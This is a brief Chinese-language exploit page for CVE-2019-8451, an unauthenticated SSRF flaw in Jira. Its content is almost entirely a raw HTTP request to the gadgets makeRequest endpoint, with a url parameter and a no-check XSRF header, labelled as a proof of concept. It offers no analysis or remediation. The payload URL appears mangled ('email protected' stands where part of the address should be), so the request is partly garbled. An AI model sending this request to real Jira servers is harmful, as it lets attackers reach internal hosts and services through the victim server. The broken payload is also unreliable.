CVE-2019-8451 Jira未授权SSRF漏洞

POC

GET /plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:email protected HTTP/1.1
Host: 10.206.1.8:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchangeb;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
X-Atlassian-Token: no-check
Connection: close
POC

相关文章
